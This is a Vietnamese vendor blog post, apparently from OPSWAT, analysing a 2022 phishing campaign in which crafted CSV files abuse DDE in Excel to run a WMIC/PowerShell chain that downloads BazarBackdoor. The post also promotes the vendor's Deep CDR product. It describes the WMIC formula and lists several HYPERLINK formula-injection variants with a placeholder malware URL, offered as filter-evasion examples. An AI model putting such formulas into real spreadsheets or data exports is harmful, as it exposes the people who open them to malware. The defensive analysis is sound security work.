Vào tháng 2 năm 2022, nhà nghiên cứu phần mềm độc hại Chris Campbell đã phát hiện ra một chiến dịch lừa đảo mới sử dụng các tệp văn bản CSV (giá trị phân tách bằng dấu phẩy) được tạo ra đặc biệt để lây nhiễm phần mềm độc hại BazarBackdoor vào thiết bị của người dùng. Trong bài đăng trên blog này, chúng tôi phân tích kịch bản tấn công và hướng dẫn bạn cách ngăn chặn cuộc tấn công tinh vi này bằng Công nghệ Deep CDR™ (Giải mã và Tái cấu trúc Nội dung).
Chiến thuật tấn công
Trong chiến dịch lừa đảo này, tội phạm mạng đã sử dụng tệp CSV - tệp văn bản được phân tách lưu trữ dữ liệu ở định dạng bảng và sử dụng dấu phẩy để phân tách các giá trị. Loại tệp này là một cách phổ biến để trao đổi dữ liệu đơn giản giữa cơ sở dữ liệu và ứng dụng. Vì tệp CSV chỉ đơn giản chứa văn bản không có mã thực thi, rất nhiều người dùng nghĩ rằng nó vô hại và nhanh chóng mở tài liệu mà không cần thận trọng. Họ không nghi ngờ rằng tệp đó có thể là vectơ đe dọa mà qua đó mã độc có thể xâm nhập vào thiết bị của họ nếu tệp CSV được mở bằng các ứng dụng hỗ trợ Dynamic Data Exchange (DDE), chẳng hạn như Microsoft Excel và OpenOffice Calc. Các ứng dụng này có thể thực thi các công thức và hàm trong tệp CSV. Các tác giả đe dọa lạm dụng tính năng DDE này để thực hiện các lệnh tùy ý, tải xuống và cài đặt trojan BazarBackdoor, để thỏa hiệp và truy cập đầy đủ vào mạng doanh nghiệp từ thiết bị của nạn nhân không cảnh giác. So với các phương pháp tấn công phổ biến với macro độc hại hoặc mã VBA ẩn trong tệp MS Office, các mối đe dọa ẩn bên trong tài liệu DDE khó phát hiện hơn.
Kiểm tra cẩn thận tệp, chúng ta có thể thấy a = WmiC | lệnh (Lệnh Giao diện Quản lý Windows) chứa trong một trong các cột dữ liệu. Nếu các nạn nhân vô tình cho phép hàm DDE này chạy, nó sẽ tạo ra một lệnh PowerShell. Các lệnh sau đó sẽ mở một URL từ xa để tải xuống BazarLoader và BazarBackdoor sẽ được cài đặt trên máy của nạn nhân.
Công nghệ Deep CDR™ giúp bạn phòng chống các cuộc tấn công DDE như thế nào?
Bạn có thể bảo vệ mạng lưới của mình khỏi các chiến dịch lừa đảo tinh vi này bằng cách lọc các tệp đính kèm trong email trước khi chúng đến tay người dùng. Với quan điểm rằng mọi tệp đều tiềm ẩn mối đe dọa và tập trung vào phòng ngừa hơn là chỉ phát hiện, Công nghệ Deep CDR™ loại bỏ tất cả nội dung hoạt động trong các tệp trong khi vẫn duy trì khả năng sử dụng và chức năng tương tự của tệp. Công nghệ Deep CDR™ là một trong sáu công nghệ chủ chốt trong MetaDefender - OPSWAT Nền tảng phòng chống mối đe dọa tiên tiến của chúng tôi thực sự tuân thủ triết lý Zero Trust.
Dưới đây là chi tiết về quá trình làm sạch sau khi chúng tôi xử lý tệp CSV bị nhiễm virus. MetaDefender Core (Bạn cũng có thể tham khảo kết quả quét trên...) MetaDefender Cloud Công nghệ Deep CDR™ đã vô hiệu hóa công thức trong tệp tin, do đó không có lệnh PowerShell nào được tạo ra. Vì vậy, phần mềm độc hại không thể được tải xuống.
Trong các cuộc tấn công tương tự, các tác giả mối đe dọa sử dụng các công thức phức tạp hơn để tránh bị phát hiện. Thông thường, các công thức trong MS Excel bắt đầu bằng dấu bằng (=). Tuy nhiên, vì ứng dụng này cũng chấp nhận các công thức bắt đầu bằng một dấu khác, chẳng hạn như "=+" hoặc "@", thay vì chỉ "=", công thức hủy trong tệp CSV có thể là:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Những loại công thức này có thể đánh lừa một số hệ thống CDR thông thường. Tuy nhiên, công nghệ Deep CDR™ có thể dễ dàng xử lý chiến thuật này và tạo ra các tệp tin sạch, an toàn để sử dụng, từ đó vô hiệu hóa mối đe dọa.
Tìm hiểu thêm về Công nghệ Deep CDR™ hoặc liên hệ với chuyên gia kỹ thuật OPSWAT để khám phá các giải pháp bảo mật tốt nhất nhằm bảo vệ mạng lưới doanh nghiệp và người dùng của bạn khỏi các cuộc tấn công zero-day và phần mềm độc hại khó phát hiện.
